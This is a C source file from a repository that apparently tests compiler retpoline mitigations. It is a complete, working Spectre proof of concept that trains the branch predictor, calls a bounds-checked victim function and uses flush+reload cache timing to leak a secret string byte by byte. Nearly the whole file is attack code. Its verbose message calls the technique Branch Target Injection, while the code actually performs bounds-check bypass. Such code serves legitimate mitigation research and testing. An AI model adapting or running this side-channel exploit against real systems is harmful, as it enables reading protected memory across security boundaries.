4a0dacbfa3
- GCC support - RETPOLINE for both GCC and clang - LLD dynamic linker to support RETPOLINE mitigations on dynamic executables - Results aggregation using SFTP
272 lines
7.0 KiB
C
272 lines
7.0 KiB
C
#include <stdio.h>
|
||
#include <stdlib.h>
|
||
#include <stdint.h>
|
||
#include <getopt.h>
|
||
#include <string.h>
|
||
#ifdef _MSC_VER
|
||
#include <intrin.h> /* for rdtscp and clflush */
|
||
#pragma optimize("gt",on)
|
||
#else
|
||
#include <x86intrin.h> /* for rdtscp and clflush */
|
||
#endif
|
||
|
||
#if defined(__i386__) || defined(__amd64__)
|
||
#define CACHELINESIZE 64
|
||
static int _has_rdtscp;
|
||
#else
|
||
#error "unsupported architecture"
|
||
#endif
|
||
|
||
#define HAVE_RDTSCP (1U << 27)
|
||
|
||
char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion.";
|
||
|
||
unsigned int array1_size = 16;
|
||
uint8_t unused1[64];
|
||
uint8_t array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
|
||
uint8_t unused2[64];
|
||
uint8_t array2[256 * 512];
|
||
uint8_t temp = 0; /* Used so compiler won’t optimize out victim_function() */
|
||
unsigned cache_hit_threshold;
|
||
int verbose;
|
||
|
||
static inline unsigned
|
||
timed_access(
|
||
volatile uint8_t *addr
|
||
)
|
||
{
|
||
uint64_t t0, t1;
|
||
#pragma GCC diagnostic ignored "-Wuninitialized"
|
||
unsigned int junk = junk;
|
||
|
||
if (_has_rdtscp) {
|
||
t0 = __rdtscp(& junk);
|
||
junk |= *addr;
|
||
t1 = __rdtscp(& junk);
|
||
} else {
|
||
t0 = __rdtsc();
|
||
junk |= *addr;
|
||
t1 = __rdtsc();
|
||
}
|
||
|
||
return (unsigned)(t1 - t0);
|
||
}
|
||
|
||
static inline void
|
||
native_cpuid(
|
||
unsigned int *eax,
|
||
unsigned int *ebx,
|
||
unsigned int *ecx,
|
||
unsigned int *edx
|
||
)
|
||
{
|
||
asm volatile("cpuid"
|
||
: "=a" (*eax),
|
||
"=b" (*ebx),
|
||
"=c" (*ecx),
|
||
"=d" (*edx)
|
||
: "0" (*eax), "2" (*ecx));
|
||
}
|
||
|
||
static void
|
||
calibrate_threshold(
|
||
int verbose,
|
||
unsigned int *threshold
|
||
)
|
||
{
|
||
volatile char buf[2 * CACHELINESIZE];
|
||
volatile uint8_t *bufp;
|
||
int i;
|
||
const int cnt = 1000;
|
||
uint64_t tcache, tmem;
|
||
unsigned eax, ebx, ecx, edx;
|
||
__attribute__((unused)) volatile int junk = 0;
|
||
|
||
eax = 0x80000001; // Has RDTSCP ?
|
||
ecx = 0;
|
||
native_cpuid(&eax, &ebx, &ecx, &edx);
|
||
if (edx & HAVE_RDTSCP) {
|
||
switch (verbose) {
|
||
case 1:
|
||
fprintf(stderr, "CPU has RDTSCP.\n");
|
||
break;
|
||
case 2:
|
||
fprintf(stdout, "CPU has RDTSCP.\n");
|
||
break;
|
||
}
|
||
_has_rdtscp = 1;
|
||
} else {
|
||
switch (verbose) {
|
||
case 1:
|
||
fprintf(stderr, "WARNING: CPU has no RDTSCP support, using RDTSC.\n");
|
||
break;
|
||
case 2:
|
||
fprintf(stdout, "WARNING: CPU has no RDTSCP support, using RDTSC.\n");
|
||
break;
|
||
}
|
||
_has_rdtscp = 0;
|
||
}
|
||
|
||
bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINESIZE) &
|
||
~(CACHELINESIZE - 1)));
|
||
|
||
junk |= *bufp;
|
||
for (i = 0, tcache = 0; i < cnt; i++)
|
||
tcache += timed_access(bufp);
|
||
tcache /= cnt;
|
||
|
||
for (i = 0, tmem = 0; i < cnt; i++) {
|
||
_mm_clflush((const void *)bufp);
|
||
_mm_mfence();
|
||
tmem += timed_access(bufp);
|
||
}
|
||
tmem /= cnt;
|
||
if (threshold != NULL) {
|
||
*threshold = tcache + (tmem - tcache) / 2;
|
||
if (*threshold == (unsigned int)tmem)
|
||
(*threshold)--;
|
||
}
|
||
|
||
switch (verbose) {
|
||
case 1:
|
||
fprintf(stderr, "Access time: memory %lu, cache %lu", tmem, tcache);
|
||
if (threshold)
|
||
fprintf(stderr, " -> threshold %d", *threshold);
|
||
fprintf(stderr, "\n");
|
||
break;
|
||
case 2:
|
||
fprintf(stdout, "Access time: memory %lu, cache %lu", tmem, tcache);
|
||
if (threshold)
|
||
fprintf(stdout, " -> threshold %d", *threshold);
|
||
fprintf(stdout, "\n");
|
||
break;
|
||
}
|
||
return;
|
||
}
|
||
|
||
void
|
||
victim_function(
|
||
size_t x
|
||
)
|
||
{
|
||
if (x < array1_size) {
|
||
temp &= array2[array1[x] * 512];
|
||
}
|
||
}
|
||
|
||
void
|
||
leak(
|
||
size_t malicious_x,
|
||
uint8_t value[2],
|
||
int score[2],
|
||
unsigned cache_hit_threshold
|
||
)
|
||
{
|
||
static int results[256];
|
||
int tries, i, j, mix_i;
|
||
unsigned int junk = 0;
|
||
size_t training_x, x;
|
||
volatile uint8_t *addr;
|
||
|
||
for (i = 0; i < 256; i++)
|
||
results[i] = 0;
|
||
for (tries = 999; tries > 0; tries--) {
|
||
|
||
/* Flush array2[256*(0..255)] from cache */
|
||
for (i = 0; i < 256; i++)
|
||
_mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */
|
||
|
||
/* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
|
||
training_x = tries % array1_size;
|
||
for (j = 29; j >= 0; j--) {
|
||
_mm_clflush(&array1_size);
|
||
for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */
|
||
//_mm_mfence(); NOT WORKING
|
||
/* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
|
||
/* Avoid jumps in case those tip off the branch predictor */
|
||
x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
|
||
x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
|
||
x = training_x ^ (x & (malicious_x ^ training_x));
|
||
/* Call the victim! */
|
||
victim_function(x);
|
||
|
||
}
|
||
|
||
/* Time reads. Order is lightly mixed up to prevent stride prediction */
|
||
for (i = 0; i < 256; i++) {
|
||
mix_i = ((i * 167) + 13) & 255;
|
||
addr = & array2[mix_i * 512];
|
||
if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size])
|
||
results[mix_i]++; /* cache hit - add +1 to score for this value */
|
||
}
|
||
|
||
/* Locate highest results in j */
|
||
j = -1;
|
||
for (i = 0; i < 256; i++) {
|
||
if (j < 0 || results[i] >= results[j]) {
|
||
j = i;
|
||
}
|
||
}
|
||
if (results[j] >= 3)
|
||
break;
|
||
}
|
||
|
||
results[0] ^= junk; /* use junk so code above won’t get optimized out*/
|
||
value[0] = (uint8_t) j;
|
||
score[0] = results[j];
|
||
}
|
||
|
||
int
|
||
main(
|
||
int argc,
|
||
char** argv
|
||
)
|
||
{
|
||
int o;
|
||
size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */
|
||
int i, score[2], len = (int)strlen(secret);
|
||
uint8_t value[2];
|
||
unsigned sucesses = 0;
|
||
|
||
while ((o = getopt(argc, argv, "t:vc")) != EOF) {
|
||
switch (o) {
|
||
case 't':
|
||
cache_hit_threshold = atoi(optarg);
|
||
break;
|
||
case 'v':
|
||
verbose++;
|
||
break;
|
||
case 'c':
|
||
calibrate_threshold(2, &cache_hit_threshold);
|
||
return 0;
|
||
default:
|
||
usage:
|
||
fprintf(stderr, "usage: %s [-v] [-c] "
|
||
"[-t threshold]\n", argv[0]);
|
||
return 2;
|
||
}
|
||
}
|
||
if (argc != optind)
|
||
goto usage;
|
||
|
||
calibrate_threshold(verbose, cache_hit_threshold ? NULL : &cache_hit_threshold);
|
||
for (i = 0; i < (int)sizeof(array2); i++)
|
||
array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
|
||
if(verbose) {
|
||
fprintf(stderr, "Leaking %d bytes using Branch Target Injection:\n", (int)strlen(secret));
|
||
}
|
||
while (--len >= 0) {
|
||
leak(malicious_x++, value, score, cache_hit_threshold);
|
||
if(score[0] == 3 && value[0] > 31 && value[0] < 127) {
|
||
sucesses++;
|
||
fprintf(stderr, "\033[32m%c\033[0m", (value[0]));
|
||
} else {
|
||
fprintf(stderr, "\033[31m?\033[0m");
|
||
}
|
||
}
|
||
fprintf(stderr, "\n");
|
||
printf("%s: %.0f %%\n", argv[0] + 2, 100 * sucesses / (float)strlen(secret));
|
||
|
||
return 0;
|
||
}
|